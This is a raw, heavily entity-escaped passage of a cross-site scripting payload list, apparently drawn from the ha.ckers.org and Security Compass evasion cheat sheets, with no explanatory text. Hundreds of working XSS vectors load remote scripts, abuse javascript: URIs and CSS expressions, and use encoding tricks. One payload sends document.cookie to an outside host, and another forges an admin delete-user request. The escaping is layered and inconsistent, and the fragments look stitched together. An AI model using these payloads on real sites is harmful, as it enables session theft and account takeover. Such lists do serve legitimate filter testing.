SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT a=&amp;quot;&gt;&amp;apos;&gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://66.102.7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://1113982867/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;h&amp;#x0A;tt&amp;#09;p://6&amp;amp;#09;6.000146.0x7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;//www.google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;//google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://ha.ckers.org@google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://google:ha.ckers.org&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://www.google.com./&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;javascript:document.location=&amp;apos;http://www.google.com/&amp;apos;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&lt;script&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&lt;img SRC=\\\&quot;jav ascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img SRC=\\\&quot; &amp;#14; javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;body onload!#$%&amp;()*~+-_.,:;?@[/|\\\\]^`=document.vulnerable=true;&gt;\\r\\n&lt;&lt;SCRIPT&gt;document.vulnerable=true;//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;script &lt;B&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&lt;img SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;\\r\\n&lt;iframe src=\\\&quot;javascript:document.vulnerable=true; &lt;\\r\\n&lt;script&gt;a=/XSS/\\\\ndocument.vulnerable=true;&lt;/script&gt;\\r\\n\\\\\\\&quot;;document.vulnerable=true;;//\\r\\n&lt;/title&gt;&lt;SCRIPT&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&lt;input TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;body BACKGROUND=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;body ONLOAD=document.vulnerable=true;&gt;\\r\\n&lt;img DYNSRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img LOWSRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;bgsound SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;br SIZE=\\\&quot;&amp;{document.vulnerable=true}\\\&quot;&gt;\\r\\n&lt;LAYER SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;&lt;/LAYER&gt;\\r\\n&lt;link REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;style&gt;li {list-style-image: url(\\\&quot;javascript:document.vulnerable=true;\\\&quot;);&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;img SRC=\\\&#039;vbscript:document.vulnerable=true;\\\&#039;&gt;\\r\\n1script3document.vulnerable=true;1/script3\\r\\n&lt;meta HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0; URL=http://;URL=javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;&lt;/iframe&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;&lt;/frameset&gt;\\r\\n&lt;table BACKGROUND=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;table&gt;&lt;TD BACKGROUND=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;div STYLE=\\\&quot;background-image: url(javascript:document.vulnerable=true;)\\\&quot;&gt;\\r\\n&lt;div STYLE=\\\&quot;background-image: url(&amp;#1;javascript:document.vulnerable=true;)\\\&quot;&gt;\\r\\n&lt;div STYLE=\\\&quot;width: expression(document.vulnerable=true);\\\&quot;&gt;\\r\\n&lt;style&gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\&#039;;&lt;/style&gt;\\r\\n&lt;img STYLE=\\\&quot;xss:expr/*XSS*/ession(document.vulnerable=true)\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:expression(document.vulnerable=true)\\\&quot;&gt;\\r\\nexp/*&lt;A STYLE=\\\&#039;no\\\\xss:noxss(\\\&quot;*//*\\\&quot;);xss:ex/*XSS*//*/*/pression(document.vulnerable=true)\\\&#039;&gt;\\r\\n&lt;style TYPE=\\\&quot;text/javascript\\\&quot;&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;style&gt;.XSS{background-image:url(\\\&quot;javascript:document.vulnerable=true\\\&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/a&gt;\\r\\n&lt;style type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:document.vulnerable=true\\\&quot;)}&lt;/style&gt;\\r\\n&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;document.vulnerable=true;&lt;/SCRIPT&gt;&lt;![endif]--&gt;\\r\\n&lt;base HREF=\\\&quot;javascript:document.vulnerable=true;//\\\&quot;&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:document.vulnerable=true&gt;&lt;/object&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![&lt;IMG SRC=\\\&quot;javas]]&lt;![cript:document.vulnerable=true;\\\&quot;&gt;]]&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/span&gt;\\r\\n&lt;XML ID=\\\&quot;xss\\\&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\&quot;javas&lt;!-- --&gt;cript:document.vulnerable=true\\\&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=\\\&quot;#xss\\\&quot; DATAFLD=\\\&quot;B\\\&quot; DATAFORMATAS=\\\&quot;HTML\\\&quot;&gt;&lt;/span&gt;\\r\\n&lt;html&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\&quot;t\\\&quot; ns=\\\&quot;urn:schemas-microsoft-com:time\\\&quot;&gt;&lt;?import namespace=\\\&quot;t\\\&quot; implementation=\\\&quot;#default#time2\\\&quot;&gt;&lt;t:set attributeName=\\\&quot;innerHTML\\\&quot; to=\\\&quot;XSS&lt;SCRIPT DEFER&gt;document.vulnerable=true&lt;/SCRIPT&gt;\\\&quot;&gt;&lt;/BODY&gt;&lt;/html&gt;\\r\\n&lt;? echo(\\\&#039;&lt;SCR)\\\&#039;;echo(\\\&#039;IPT&gt;document.vulnerable=true&lt;/SCRIPT&gt;\\\&#039;); ?&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\&quot;Set-Cookie\\\&quot; Content=\\\&quot;USERID=&lt;SCRIPT&gt;document.vulnerable=true&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;head&gt;&lt;META HTTP-EQUIV=\\\&quot;CONTENT-TYPE\\\&quot; CONTENT=\\\&quot;text/html; charset=UTF-7\\\&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-\\r\\n&lt;a href=\\\&quot;javascript#document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;div onmouseover=\\\&quot;document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img dynsrc=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;input type=\\\&quot;image\\\&quot; dynsrc=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;bgsound src=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&amp;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&amp;{document.vulnerable=true;};\\r\\n&lt;img src=&amp;{document.vulnerable=true;};&gt;\\r\\n&lt;link rel=\\\&quot;stylesheet\\\&quot; href=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;iframe src=\\\&quot;vbscript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;mocha:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;livescript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;a href=\\\&quot;about:&lt;script&gt;document.vulnerable=true;&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;url=javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;body onload=\\\&quot;document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;background-image: url(javascript:document.vulnerable=true;);\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;behaviour: url([link to code]);\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;binding: url([link to code]);\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;width: expression(document.vulnerable=true;);\\\&quot;&gt;\\r\\n&lt;style type=\\\&quot;text/javascript\\\&quot;&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;object classid=\\\&quot;clsid:...\\\&quot; codebase=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.vulnerable=true;//--&gt;&lt;/script&gt;\\r\\n&lt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&lt;![&lt;!--]]&lt;script&gt;document.vulnerable=true;//--&gt;&lt;/script&gt;\\r\\n&lt;!-- -- --&gt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;&lt;!-- -- --&gt;\\r\\n&lt;img src=\\\&quot;blah\\\&quot;onmouseover=\\\&quot;document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;blah&gt;\\\&quot; onmouseover=\\\&quot;document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;xml src=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;xml id=\\\&quot;X\\\&quot;&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;\\r\\n&lt;div datafld=\\\&quot;b\\\&quot; dataformatas=\\\&quot;html\\\&quot; datasrc=\\\&quot;#X\\\&quot;&gt;&lt;/div&gt;\\r\\n[\\\\xC0][\\\\xBC]script&gt;document.vulnerable=true;[\\\\xC0][\\\\xBC]/script&gt;\\r\\n&lt;style&gt;@import\\\&#039;http://www.securitycompass.com/xss.css\\\&#039;;&lt;/style&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\&quot;Link\\\&quot; Content=\\\&quot;&lt;http://www.securitycompass.com/xss.css&gt;; REL=stylesheet\\\&quot;&gt;\\r\\n&lt;style&gt;BODY{-moz-binding:url(\\\&quot;http://www.securitycompass.com/xssmoz.xml#xss\\\&quot;)}&lt;/style&gt;\\r\\n&lt;OBJECT TYPE=\\\&quot;text/x-scriptlet\\\&quot; DATA=\\\&quot;http://www.securitycompass.com/scriptlet.html\\\&quot;&gt;&lt;/object&gt;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\&quot;xss\\\&quot; implementation=\\\&quot;http://www.securitycompass.com/xss.htc\\\&quot;&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/html&gt;\\r\\n&lt;script SRC=\\\&quot;http://www.securitycompass.com/xss.jpg\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;&lt;SCR\\\&#039;\\\&quot;--&gt;&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;IPT SRC=http://www.securitycompass.com/xss.js&gt;&lt;/SCRIPT&gt;\\\&#039;\\\&quot;--&gt;\\r\\n&lt;script a=\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script =\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script a=\\\&quot;&gt;\\\&quot; \\\&#039;\\\&#039; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script \\\&quot;a=\\\&#039;&gt;\\\&#039;\\\&quot; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script a=`&gt;` SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script a=\\\&quot;&gt;\\\&#039;&gt;\\\&quot; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script&gt;document.write(\\\&quot;&lt;SCRI\\\&quot;);&lt;/SCRIPT&gt;PT SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;div style=\\\&quot;binding: url(http://www.securitycompass.com/xss.js);\\\&quot;&gt; [Mozilla]\\r\\n&amp;quot;&amp;gt;&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\\\\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;\\r\\n&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;\\r\\n&amp;lt;/br style=a:expression(alert())&amp;gt;\\r\\n&amp;lt;scrscriptipt&amp;gt;alert(1)&amp;lt;/scrscriptipt&amp;gt;\\r\\n&amp;lt;br size=\\\\&amp;quot;&amp;amp;{alert(&amp;#039;XSS&amp;#039;)}\\\\&amp;quot;&amp;gt;\\r\\nperl -e &amp;#039;print \\\\&amp;quot;&amp;lt;IMG SRC=java\\\\0script:alert(\\\\&amp;quot;XSS\\\\&amp;quot;)&amp;gt;\\\\&amp;quot;;&amp;#039; &amp;gt; out\\r\\nperl -e &amp;#039;print \\\\&amp;quot;&amp;lt;SCR\\\\0IPT&amp;gt;alert(\\\\&amp;quot;XSS\\\\&amp;quot;)&amp;lt;/SCR\\\\0IPT&amp;gt;\\\\&amp;quot;;&amp;#039; &amp;gt; out\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=\\\&quot;http://www.procheckup.com/?sid=\\\&quot;%2bdocument.cookie)&gt;\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n&lt;~/XSS STYLE=xss:expression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n\\\&quot;&gt;&lt;script&gt;alert(\\\&#039;XSS\\\&#039;)&lt;/script&gt;\\r\\n&lt;/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\nXSS STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n&lt;/XSS STYLE=xss:expression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n\\\&#039;;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;;alert(String.fromCharCode(88,83,83))//\\\&quot;;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;;alert(String.fromCharCode(88,83,83))//--&gt;;&lt;;/SCRIPT&gt;;\\\&quot;;&gt;;\\\&#039;;&gt;;&lt;;SCRIPT&gt;;alert(String.fromCharCode(88,83,83))&lt;;/SCRIPT&gt;;\\r\\n\\\&#039;;\\\&#039;;;!--\\\&quot;;&lt;;XSS&gt;;=&amp;;{()}\\r\\n&lt;;SCRIPT&gt;;alert(\\\&#039;;XSS\\\&#039;;)&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT&gt;;alert(String.fromCharCode(88,83,83))&lt;;/SCRIPT&gt;;\\r\\n&lt;;BASE HREF=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);//\\\&quot;;&gt;;\\r\\n&lt;;BGSOUND SRC=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;BODY BACKGROUND=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;BODY ONLOAD=alert(\\\&#039;;XSS\\\&#039;;)&gt;;\\r\\n&lt;;DIV STYLE=\\\&quot;;background-image: url(javascript:alert(\\\&#039;;XSS\\\&#039;;))\\\&quot;;&gt;;\\r\\n&lt;;DIV STYLE=\\\&quot;;background-image: url(&amp;;#1;javascript:alert(\\\&#039;;XSS\\\&#039;;))\\\&quot;;&gt;;\\r\\n&lt;;DIV STYLE=\\\&quot;;width: expression(alert(\\\&#039;;XSS\\\&#039;;));\\\&quot;;&gt;;\\r\\n&lt;;FRAMESET&gt;;&lt;;FRAME SRC=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;&lt;;/FRAMESET&gt;;\\r\\n&lt;;IFRAME SRC=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;&lt;;/IFRAME&gt;;\\r\\n&lt;;INPUT TYPE=\\\&quot;;IMAGE\\\&quot;; SRC=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;IMG SRC=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;IMG SRC=javascript:alert(\\\&#039;;XSS\\\&#039;;)&gt;;\\r\\n&lt;;IMG DYNSRC=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;IMG LOWSRC=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;IMG SRC=\\\&quot;;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\&quot;;&gt;;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&amp;;deleteuser\\r\\nexp/*&lt;;XSS STYLE=\\\&#039;;no\\\\xss:noxss(\\\&quot;;*//*\\\&quot;;);\\r\\n&lt;;STYLE&gt;;li {list-style-image: url(\\\&quot;;javascript:alert(&amp;#39;XSS&amp;#39;)\\\&quot;;);}&lt;;/STYLE&gt;;&lt;;UL&gt;;&lt;;LI&gt;;XSS\\r\\n&lt;;IMG SRC=\\\&#039;;vbscript:msgbox(\\\&quot;;XSS\\\&quot;;)\\\&#039;;&gt;;\\r\\n&lt;;LAYER SRC=\\\&quot;;http://ha.ckers.org/scriptlet.html\\\&quot;;&gt;;&lt;;/LAYER&gt;;\\r\\n&lt;;IMG SRC=\\\&quot;;livescript:[code]\\\&quot;;&gt;;\\r\\n%BCscript%BEalert(%A2XSS%A2)%BC/script%BE\\r\\n&lt;;META HTTP-EQUIV=\\\&quot;;refresh\\\&quot;; CONTENT=\\\&quot;;0;url=javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;META HTTP-EQUIV=\\\&quot;;refresh\\\&quot;; CONTENT=\\\&quot;;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\&quot;;&gt;;\\r\\n&lt;;META HTTP-EQUIV=\\\&quot;;refresh\\\&quot;; CONTENT=\\\&quot;;0; URL=http://;URL=javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;IMG SRC=\\\&quot;;mocha:[code]\\\&quot;;&gt;;\\r\\n&lt;;OBJECT TYPE=\\\&quot;;text/x-scriptlet\\\&quot;; DATA=\\\&quot;;http://ha.ckers.org/scriptlet.html\\\&quot;;&gt;;&lt;;/OBJECT&gt;;\\r\\n&lt;;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;;&lt;;param name=url value=javascript:alert(\\\&#039;;XSS\\\&#039;;)&gt;;&lt;;/OBJECT&gt;;\\r\\n&lt;;EMBED SRC=\\\&quot;;http://ha.ckers.org/xss.swf\\\&quot;; AllowScriptAccess=\\\&quot;;always\\\&quot;;&gt;;&lt;;/EMBED&gt;;\\r\\na=\\\&quot;;get\\\&quot;;;&amp;;#10;b=\\\&quot;;URL(\\\&quot;;\\\&quot;;;&amp;;#10;c=\\\&quot;;javascript:\\\&quot;;;&amp;;#10;d=\\\&quot;;alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;)\\\&quot;;;&amp;#10;eval(a+b+c+d);\\r\\n&lt;;STYLE TYPE=\\\&quot;;text/javascript\\\&quot;;&gt;;alert(\\\&#039;;XSS\\\&#039;;);&lt;;/STYLE&gt;;\\r\\n&lt;;IMG STYLE=\\\&quot;;xss:expr/*XSS*/ession(alert(\\\&#039;;XSS\\\&#039;;))\\\&quot;;&gt;;\\r\\n&lt;;XSS STYLE=\\\&quot;;xss:expression(alert(\\\&#039;;XSS\\\&#039;;))\\\&quot;;&gt;;\\r\\n&lt;;STYLE&gt;;.XSS{background-image:url(\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;)\\\&quot;;);}&lt;;/STYLE&gt;;&lt;;A CLASS=XSS&gt;;&lt;;/A&gt;;\\r\\n&lt;;STYLE type=\\\&quot;;text/css\\\&quot;;&gt;;BODY{background:url(\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;)\\\&quot;;)}&lt;;/STYLE&gt;;\\r\\n&lt;;LINK REL=\\\&quot;;stylesheet\\\&quot;; HREF=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;LINK REL=\\\&quot;;stylesheet\\\&quot;; HREF=\\\&quot;;http://ha.ckers.org/xss.css\\\&quot;;&gt;;\\r\\n&lt;;STYLE&gt;;@import\\\&#039;;http://ha.ckers.org/xss.css\\\&#039;;;&lt;;/STYLE&gt;;\\r\\n&lt;;META HTTP-EQUIV=\\\&quot;;Link\\\&quot;; Content=\\\&quot;;&lt;;http://ha.ckers.org/xss.css&gt;;; REL=stylesheet\\\&quot;;&gt;;\\r\\n&lt;;STYLE&gt;;BODY{-moz-binding:url(\\\&quot;;http://ha.ckers.org/xssmoz.xml#xss\\\&quot;;)}&lt;;/STYLE&gt;;\\r\\n&lt;;TABLE BACKGROUND=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;)\\\&quot;;&gt;;&lt;;/TABLE&gt;;\\r\\n&lt;;TABLE&gt;;&lt;;TD BACKGROUND=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;)\\\&quot;;&gt;;&lt;;/TD&gt;;&lt;;/TABLE&gt;;\\r\\n&lt;;HTML xmlns:xss&gt;;\\r\\n&lt;;XML ID=I&gt;;&lt;;X&gt;;&lt;;C&gt;;&lt;;![CDATA[&lt;;IMG SRC=\\\&quot;;javas]]&gt;;&lt;;![CDATA[cript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;]]&gt;;\\r\\n&lt;;XML ID=\\\&quot;;xss\\\&quot;;&gt;;&lt;;I&gt;;&lt;;B&gt;;&lt;;IMG SRC=\\\&quot;;javas&lt;;!-- --&gt;;cript:alert(\\\&#039;;XSS\\\&#039;;)\\\&quot;;&gt;;&lt;;/B&gt;;&lt;;/I&gt;;&lt;;/XML&gt;;\\r\\n&lt;;XML SRC=\\\&quot;;http://ha.ckers.org/xsstest.xml\\\&quot;; ID=I&gt;;&lt;;/XML&gt;;\\r\\n&lt;;HTML&gt;;&lt;;BODY&gt;;\\r\\n&lt;;!--[if gte IE 4]&gt;; \\r\\n&lt;;META HTTP-EQUIV=\\\&quot;;Set-Cookie\\\&quot;; Content=\\\&quot;;USERID=&lt;;SCRIPT&gt;;alert(\\\&#039;;XSS\\\&#039;;)&lt;;/SCRIPT&gt;;\\\&quot;;&gt;;\\r\\n&lt;;XSS STYLE=\\\&quot;;behavior: url(http://ha.ckers.org/xss.htc);\\\&quot;;&gt;;\\r\\n&lt;;SCRIPT SRC=\\\&quot;;http://ha.ckers.org/xss.jpg\\\&quot;;&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;!--#exec cmd=\\\&quot;;/bin/echo \\\&#039;;&lt;;SCRIPT SRC\\\&#039;;\\\&quot;;--&gt;;&lt;;!--#exec cmd=\\\&quot;;/bin/echo \\\&#039;;=http://ha.ckers.org/xss.js&gt;;&lt;;/SCRIPT&gt;;\\\&#039;;\\\&quot;;--&gt;;\\r\\n&lt;;? echo(\\\&#039;;&lt;;SCR)\\\&#039;;;\\r\\n&lt;;BR SIZE=\\\&quot;;&amp;;{alert(\\\&#039;;XSS\\\&#039;;)}\\\&quot;;&gt;;\\r\\n&lt;;IMG SRC=JaVaScRiPt:alert(\\\&#039;;XSS\\\&#039;;)&gt;;\\r\\n&lt;;IMG SRC=javascript:alert(&amp;;quot;XSS&amp;;quot;)&gt;;\\r\\n&lt;;IMG SRC=`javascript:alert(\\\&quot;;RSnake says, \\\&#039;;XSS\\\&#039;;\\\&quot;;)`&gt;;\\r\\n&lt;;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;;\\r\\n&lt;;IMG RC=&amp;;#106;&amp;;#97;&amp;;#118;&amp;;#97;&amp;;#115;&amp;;#99;&amp;;#114;&amp;;#105;&amp;;#112;&amp;;#116;&amp;;#58;&amp;;#97;&amp;;#108;&amp;;#101;&amp;;#114;&amp;;#116;&amp;;#40;&amp;;#39;&amp;;#88;&amp;;#83;&amp;;#83;&amp;;#39;&amp;;#41;&gt;;\\r\\n&lt;;IMG RC=&amp;;#0000106&amp;;#0000097&amp;;#0000118&amp;;#0000097&amp;;#0000115&amp;;#0000099&amp;;#0000114&amp;;#0000105&amp;;#0000112&amp;;#0000116&amp;;#0000058&amp;;#0000097&amp;;#0000108&amp;;#0000101&amp;;#0000114&amp;;#0000116&amp;;#0000040&amp;;#0000039&amp;;#0000088&amp;;#0000083&amp;;#0000083&amp;;#0000039&amp;;#0000041&gt;;\\r\\n&lt;;DIV STYLE=\\\&quot;;background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\&#039;;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.10530053\\\\0027\\\\0029\\\&#039;;\\\\0029\\\&quot;;&gt;;\\r\\n&lt;;IMG SRC=&amp;;#x6A&amp;;#x61&amp;;#x76&amp;;#x61&amp;;#x73&amp;;#x63&amp;;#x72&amp;;#x69&amp;;#x70&amp;;#x74&amp;;#x3A&amp;;#x61&amp;;#x6C&amp;;#x65&amp;;#x72&amp;;#x74&amp;;#x28&amp;;#x27&amp;;#x58&amp;;#x53&amp;;#x53&amp;;#x27&amp;;#x29&gt;;\\r\\n&lt;;HEAD&gt;;&lt;;META 